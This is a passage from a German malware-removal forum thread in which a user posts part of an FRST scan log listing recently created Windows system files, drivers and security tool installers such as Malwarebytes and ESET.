2016-04-25 13:34 - 2016-04-02 06:10 - 00770640 _____ (Microsoft Corporation) C:\WINDOWS\system32\iuilp.dll
2016-04-25 13:34 - 2016-04-02 06:10 - 00374008 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-04-25 13:34 - 2016-04-02 05:30 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2016-04-25 13:34 - 2016-04-02 05:29 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEDataLayerHelpers.dll
2016-04-25 13:34 - 2016-04-02 05:25 - 00278528 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2016-04-25 13:34 - 2016-04-02 05:25 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NotificationObjFactory.dll
2016-04-25 13:34 - 2016-04-02 05:23 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEEventDispatcher.dll
2016-04-25 13:34 - 2016-04-02 05:23 - 00219648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2016-04-25 13:34 - 2016-04-02 05:08 - 02193408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2016-04-25 13:34 - 2016-04-02 05:03 - 04774912 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-04-25 13:34 - 2016-03-29 12:23 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-04-25 13:34 - 2016-03-29 12:15 - 00100232 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmapi.dll
2016-04-25 13:34 - 2016-03-29 12:02 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-04-25 13:34 - 2016-03-29 12:02 - 00334736 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2016-04-25 13:34 - 2016-03-29 11:28 - 00115040 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-04-25 13:34 - 2016-03-29 11:25 - 00058400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsNativeApi.dll
2016-04-25 13:34 - 2016-03-29 11:18 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-04-25 13:34 - 2016-03-29 11:11 - 00074424 _____ (Microsoft Corporation) C:\WINDOWS\system32\easinvoker.exe
2016-04-25 13:34 - 2016-03-29 11:10 - 00110584 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvcli.dll
2016-04-25 13:34 - 2016-03-29 11:09 - 00078040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkscli.dll
2016-04-25 13:34 - 2016-03-29 11:07 - 00081144 _____ (Microsoft Corporation) C:\WINDOWS\system32\netapi32.dll
2016-04-25 13:34 - 2016-03-29 10:44 - 00084832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-04-25 13:34 - 2016-03-29 10:41 - 00051128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsNativeApi.dll
2016-04-25 13:34 - 2016-03-29 10:26 - 00073872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srvcli.dll
2016-04-25 13:34 - 2016-03-29 10:25 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wkscli.dll
2016-04-25 13:34 - 2016-03-29 10:23 - 00069744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netapi32.dll
2016-04-25 13:34 - 2016-03-29 10:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-04-25 13:34 - 2016-03-29 10:16 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-04-25 13:34 - 2016-03-29 10:07 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsNativeApi.V2.dll
2016-04-25 13:34 - 2016-03-29 10:07 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-04-25 13:34 - 2016-03-29 10:07 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2016-04-25 13:34 - 2016-03-29 10:07 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsdchngr.dll
2016-04-25 13:34 - 2016-03-29 10:06 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-04-25 13:34 - 2016-03-29 10:06 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacchooks.dll
2016-04-25 13:34 - 2016-03-29 10:02 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2016-04-25 13:34 - 2016-03-29 10:00 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-04-25 13:34 - 2016-03-29 10:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveskybackup.dll
2016-04-25 13:34 - 2016-03-29 10:00 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-04-25 13:34 - 2016-03-29 09:59 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerShellext.exe
2016-04-25 13:34 - 2016-03-29 09:57 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-04-25 13:34 - 2016-03-29 09:57 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\browcli.dll
2016-04-25 13:34 - 2016-03-29 09:55 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-04-25 13:34 - 2016-03-29 09:55 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serial.sys
2016-04-25 13:34 - 2016-03-29 09:55 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2016-04-25 13:34 - 2016-03-29 09:54 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-04-25 13:34 - 2016-03-29 09:53 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-04-25 13:34 - 2016-03-29 09:52 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2016-04-25 13:34 - 2016-03-29 09:51 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-04-25 13:34 - 2016-03-29 09:51 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2016-04-25 13:34 - 2016-03-29 09:50 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\BdeHdCfgLib.dll
2016-04-25 13:34 - 2016-03-29 09:50 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-04-25 13:34 - 2016-03-29 09:50 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-04-25 13:34 - 2016-03-29 09:50 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\OnDemandConnRouteHelper.dll
2016-04-25 13:34 - 2016-03-29 09:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2016-04-25 13:34 - 2016-03-29 09:49 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-04-25 13:34 - 2016-03-29 09:48 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2016-04-25 13:34 - 2016-03-29 09:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-04-25 13:34 - 2016-03-29 09:46 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll
2016-04-25 13:34 - 2016-03-29 09:44 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAFWSD.dll
2016-04-25 13:34 - 2016-03-29 09:36 - 00530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2016-04-25 13:34 - 2016-03-29 09:35 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll

StOony 28.04.2016 20:53
FRST zweiter Teil

Code:
2016-04-25 13:34 - 2016-03-29 09:35 - 00239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-04-25 13:34 - 2016-03-29 09:34 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-04-25 13:34 - 2016-03-29 09:34 - 00333824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\portcls.sys
2016-04-25 13:34 - 2016-03-29 09:34 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2016-04-25 13:34 - 2016-03-29 09:33 - 00174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll
2016-04-25 13:34 - 2016-03-29 09:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-04-25 13:34 - 2016-03-29 09:23 - 00694784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-04-25 13:34 - 2016-03-29 09:21 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-25 13:34 - 2016-03-29 09:20 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsNativeApi.V2.dll
2016-04-25 13:34 - 2016-03-29 09:20 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsdchngr.dll
2016-04-25 13:34 - 2016-03-29 09:19 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-04-25 13:34 - 2016-03-29 09:19 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacchooks.dll
2016-04-25 13:34 - 2016-03-29 09:18 - 00676352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSDApi.dll
2016-04-25 13:34 - 2016-03-29 09:17 - 00708608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2016-04-25 13:34 - 2016-03-29 09:16 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2016-04-25 13:34 - 2016-03-29 09:11 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-04-25 13:34 - 2016-03-29 09:11 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-04-25 13:34 - 2016-03-29 09:09 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-04-25 13:34 - 2016-03-29 09:09 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tbauth.dll
2016-04-25 13:34 - 2016-03-29 09:08 - 00888320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-04-25 13:34 - 2016-03-29 09:08 - 00841216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-04-25 13:34 - 2016-03-29 09:08 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-04-25 13:34 - 2016-03-29 09:06 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerCookies.exe
2016-04-25 13:34 - 2016-03-29 09:05 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OnDemandConnRouteHelper.dll
2016-04-25 13:34 - 2016-03-29 09:04 - 00103936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Devices.dll
2016-04-25 13:34 - 2016-03-29 09:03 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-04-25 13:34 - 2016-03-29 09:00 - 00235008 _____ C:\WINDOWS\system32\MTF.dll
2016-04-25 13:34 - 2016-03-29 09:00 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-04-25 13:34 - 2016-03-29 08:59 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-04-25 13:34 - 2016-03-29 08:59 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-04-25 13:34 - 2016-03-29 08:59 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-04-25 13:34 - 2016-03-29 08:53 - 00323072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2016-04-25 13:34 - 2016-03-29 08:53 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2016-04-25 13:34 - 2016-03-29 08:52 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-04-25 13:34 - 2016-03-29 08:52 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\easwrt.dll
2016-04-25 13:34 - 2016-03-29 08:49 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-04-25 13:34 - 2016-03-29 08:42 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-25 13:34 - 2016-03-29 08:41 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2016-04-25 13:34 - 2016-03-29 08:39 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSDApi.dll
2016-04-25 13:34 - 2016-03-29 08:39 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2016-04-25 13:34 - 2016-03-29 08:34 - 00784896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-04-25 13:34 - 2016-03-29 08:32 - 00854528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2016-04-25 13:34 - 2016-03-29 08:32 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-04-25 13:34 - 2016-03-29 08:32 - 00176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2016-04-25 13:34 - 2016-03-29 08:32 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcsps.dll
2016-04-25 13:34 - 2016-03-29 08:31 - 00705536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-04-25 13:34 - 2016-03-29 08:29 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-04-25 13:34 - 2016-03-29 08:29 - 00256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-04-25 13:34 - 2016-03-29 08:27 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-04-25 13:34 - 2016-03-29 08:27 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll
2016-04-25 13:34 - 2016-03-29 08:27 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-04-25 13:34 - 2016-03-29 08:06 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2016-04-25 13:34 - 2016-03-29 08:05 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-04-25 13:34 - 2016-03-29 08:04 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-04-25 13:34 - 2016-03-29 08:01 - 00957952 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2016-04-25 13:34 - 2016-03-29 08:00 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-04-25 13:34 - 2016-03-29 07:45 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2016-04-25 13:34 - 2016-03-29 07:35 - 00821248 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-04-25 13:34 - 2016-03-29 07:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-04-25 13:34 - 2016-03-29 07:27 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2016-04-25 13:34 - 2016-03-29 07:26 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\FWPUCLNT.DLL
2016-04-25 13:34 - 2016-03-29 07:25 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FWPUCLNT.DLL
2016-04-25 13:34 - 2016-03-29 07:21 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2016-04-25 13:34 - 2016-02-24 10:54 - 00127840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS
2016-04-25 13:34 - 2016-02-24 10:39 - 00141560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-04-25 13:34 - 2016-02-24 10:09 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-04-25 13:34 - 2016-02-24 09:39 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-04-25 13:34 - 2016-02-24 09:39 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-04-25 13:34 - 2016-02-24 09:38 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-04-25 13:34 - 2016-02-24 09:37 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-04-25 13:34 - 2016-02-24 09:36 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-04-25 13:34 - 2016-02-24 09:33 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-04-25 13:34 - 2016-02-24 09:30 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-04-25 13:34 - 2016-02-24 09:28 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-04-25 13:34 - 2016-02-24 09:23 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-04-25 13:34 - 2016-02-24 09:23 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-04-25 13:34 - 2016-02-24 09:22 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-04-25 13:34 - 2016-02-24 09:19 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-04-25 13:34 - 2016-02-24 09:19 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-04-25 13:34 - 2016-02-24 09:14 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-04-25 13:34 - 2016-02-24 09:13 - 00121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-04-25 13:34 - 2016-02-24 09:12 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-04-25 13:34 - 2016-02-24 09:12 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-04-25 13:34 - 2016-02-24 09:10 - 00093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-04-25 13:34 - 2016-02-24 09:09 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-04-25 13:34 - 2016-02-24 09:09 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-04-25 13:34 - 2016-02-24 09:07 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-04-25 13:34 - 2016-02-24 09:03 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-04-25 13:34 - 2016-02-24 09:01 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\profext.dll
2016-04-25 13:34 - 2016-02-24 09:00 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-04-25 13:34 - 2016-02-24 08:59 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-04-25 13:34 - 2016-02-24 08:58 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-04-25 13:34 - 2016-02-24 08:55 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-04-25 13:34 - 2016-02-24 08:55 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-04-25 13:34 - 2016-02-24 08:54 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-04-25 13:34 - 2016-02-24 08:54 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-04-25 13:34 - 2016-02-24 08:54 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-04-25 13:34 - 2016-02-24 08:53 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-04-25 13:34 - 2016-02-24 08:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-04-25 13:34 - 2016-02-24 08:52 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-04-25 13:34 - 2016-02-24 08:46 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-04-25 13:34 - 2016-02-24 08:44 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-04-25 13:34 - 2016-02-24 08:40 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-04-25 13:34 - 2016-02-24 08:40 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-04-25 13:34 - 2016-02-24 08:39 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-04-25 13:34 - 2016-02-24 08:38 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-04-25 13:34 - 2016-02-24 08:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-04-25 13:34 - 2016-02-24 08:31 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-04-25 13:34 - 2016-02-24 08:31 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-04-25 13:34 - 2016-02-24 08:28 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-04-25 13:34 - 2016-02-24 08:28 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-04-25 13:34 - 2016-02-24 08:23 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-04-25 13:34 - 2016-02-24 08:22 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profext.dll
2016-04-25 13:34 - 2016-02-24 08:21 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-04-25 13:34 - 2016-02-24 08:18 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-04-25 13:34 - 2016-02-24 08:16 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-04-25 13:34 - 2016-02-24 07:43 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-04-25 13:34 - 2016-02-24 07:22 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-04-25 13:34 - 2016-02-23 12:33 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-04-25 13:34 - 2016-02-23 12:17 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-04-25 13:34 - 2016-02-23 11:25 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-04-25 13:34 - 2016-02-23 11:12 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-04-25 13:34 - 2016-02-23 11:10 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-04-25 13:34 - 2016-02-23 11:07 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-04-25 13:34 - 2016-02-23 11:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-04-25 13:34 - 2016-02-23 11:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-04-25 13:34 - 2016-02-23 11:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-04-25 13:34 - 2016-02-23 10:58 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-04-25 13:34 - 2016-02-23 10:53 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-04-25 13:34 - 2016-02-23 10:48 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-04-25 13:34 - 2016-02-23 10:33 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-04-25 13:34 - 2016-02-23 10:23 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-04-25 13:34 - 2016-02-23 10:02 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-04-25 13:34 - 2016-02-23 09:57 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-04-24 23:11 - 2016-04-24 23:11 - 00852720 _____ C:\Users\Harun\Desktop\SecurityCheck.exe
2016-04-24 22:16 - 2016-04-24 22:16 - 02870984 _____ (ESET) C:\Users\Harun\Downloads\esetsmartinstaller_deu.exe
2016-04-24 22:13 - 2016-04-24 22:13 - 00061898 _____ C:\Users\Harun\Desktop\MBAM 2.txt
2016-04-24 22:13 - 2016-04-24 22:13 - 00061898 _____ C:\MBAM 2.txt
2016-04-24 22:13 - 2016-04-24 22:13 - 00002071 _____ C:\Users\Harun\Desktop\MBAM 1.txt
2016-04-24 22:02 - 2016-04-24 22:09 - 00001172 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-04-24 22:02 - 2016-04-24 22:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-04-24 22:02 - 2016-04-24 22:02 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-04-24 22:02 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-04-24 22:02 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-04-24 22:01 - 2016-04-24 22:01 - 22851472 _____ (Malwarebytes ) C:\Users\Harun\Downloads\mbam-setup-2.2.1.1043.exe
2016-04-24 21:59 - 2016-04-24 21:59 - 00000000 ____D C:\Users\Harun\AppData\Local\ActiveSync
2016-04-24 21:57 - 2016-04-24 21:57 - 00000020 ___SH C:\Users\Harun\ntuser.ini
2016-04-24 20:15 - 2016-04-26 17:44 - 00000000 ___DC C:\WINDOWS\Panther
2016-04-24 20:13 - 2016-04-24 20:13 - 00000000 ____D C:\Windows.old
2016-04-24 20:13 - 2015-10-29 20:43 - 05739520 _____ (Microsoft Corporation) C:\WINDOWS\system32\prm0009.dll
2016-04-24 20:13 - 2015-10-29 20:43 - 02629632 _____ (Microsoft Corporation) C:\WINDOWS\system32\NlsLexicons0009.dll
2016-04-24 20:13 - 2015-10-29 20:41 - 02629632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NlsLexicons0009.dll
2016-04-24 20:13 - 2015-10-29 20:25 - 06359040 _____ (Microsoft Corporation) C:\WINDOWS\system32\NlsData0009.dll
2016-04-24 20:13 - 2015-10-29 20:24 - 04847616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NlsData0009.dll
2016-04-24 20:12 - 2016-04-24 20:12 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2016-04-24 20:11 - 2016-04-24 20:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-04-24 20:11 - 2016-04-24 20:11 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
